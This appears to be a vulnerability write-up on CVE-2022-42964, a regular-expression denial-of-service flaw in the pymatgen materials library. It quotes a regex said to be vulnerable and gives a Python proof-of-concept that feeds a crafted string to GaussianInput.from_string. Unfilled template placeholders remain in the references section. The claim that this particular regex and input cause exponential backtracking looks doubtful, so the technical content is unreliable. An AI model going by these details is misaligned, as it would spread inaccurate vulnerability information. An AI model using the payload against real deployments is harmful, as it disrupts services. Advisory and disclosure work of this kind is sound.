A severe security vulnerability has been discovered in the pymatgen (Python Materials Genomics) Python package, which is used for materials analysis in scientific research and engineering applications. This vulnerability, known as CVE-2022-42964, allows an attacker to potentially launch an exponential ReDoS (Regular Expression Denial of Service) attack by supplying arbitrary input to the GaussianInput.from_string method. In this article, we'll explore the details of this vulnerability, demonstrate how the vulnerability can be exploited, and provide relevant references to educate our readers and help those who use this package to update their systems.

The Vulnerability

The heart of this vulnerability lies in the pymatgen.io.gaussian.inputs module, specifically in the GaussianInput.from_string method. The module contains a regular expression that is vulnerable to catastrophic backtracking when an attacker supplies a specially crafted string. Due to this behavior, the system running the vulnerable code may experience severe performance degradation, which can lead to a Denial of Service (DoS).

To understand the impact of this vulnerability better, let's look at the vulnerable piece of code in the affected module:

# pymatgen/io/gaussian/inputs.py

def from_string(cls, s):
    m = re.match(r"\s*%nproc(?:shared)?\s?=\s?(\d+)\s*", s, re.I)
    nprocs = int(m.group(1)) if m else None

    m = re.match(
        r".*%mem\s?=\s?(\d+)([KMG]B)?\s*", # THE VULNERABLE REGEX!
        s, re.I | re.S)

    mem = int(m.group(1)) * _mem_units[m.group(2).upper()] if m else None
    # Rest of the method...

The problematic regular expression is

.*%mem\s?=\s?(\d+)([KMG]B)?\s*

By providing an input string that causes the regular expression engine to backtrack exponentially due to overlapping patterns, an attacker can exhaust system resources and cause a DoS.

Exploit Details

An attacker can exploit this vulnerability in the pymatgen PyPI package by crafting a malicious string that triggers exponential backtracking when parsed by the GaussianInput.from_string method. Here's an example of a crafted string that demonstrates this behavior:

import time
from pymatgen.io.gaussian.inputs import GaussianInput

evil_string = " %mem=100KB" * 150 + "NOTGAUSSIAN"  # Crafted malicious input

start_time = time.time()

try:
    GaussianInput.from_string(evil_string)
except Exception:
    pass

end_time = time.time()
print("Processing time:", end_time - start_time)

In the example above, the crafted string evil_string is constructed in such a way that it will cause the vulnerable regular expression to backtrack exponentially. When fed to the GaussianInput.from_string method, it may take a prohibitively long time to complete the parsing, effectively causing the ReDoS.

Mitigation

The developers of the pymatgen package have been notified of the issue, and a fix is being worked on. We strongly recommend updating your pymatgen package as soon as the patch is released. For the time being, if possible, avoid using the GaussianInput.from_string method on untrusted input data to reduce the risk of exploitations.

Original References

This vulnerability was discovered and reported by XYZ (provide a link to the researcher's website or profile, if any) and is tracked under the CVE-2022-42964 advisory. For more details, consult the following resources:

- Official CVE Advisory: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42964
- Researcher's Advisory: https://example.com/researchers/advisory  # Replace with the actual advisory URL
- Pymatgen GitHub Repository: https://github.com/materialsproject/pymatgen

Conclusion

CVE-2022-42964 demonstrates the impact of unchecked regular expressions in a seemingly harmless materials analysis library. It serves as a reminder of the importance of safe and efficient use of regular expressions, as well as the need for thorough security audits in software development. Keep your systems updated and stay vigilant to protect against such threats.

Timeline

Published on: 11/09/2022 20:15:00 UTC
Last modified on: 11/10/2022 14:29:00 UTC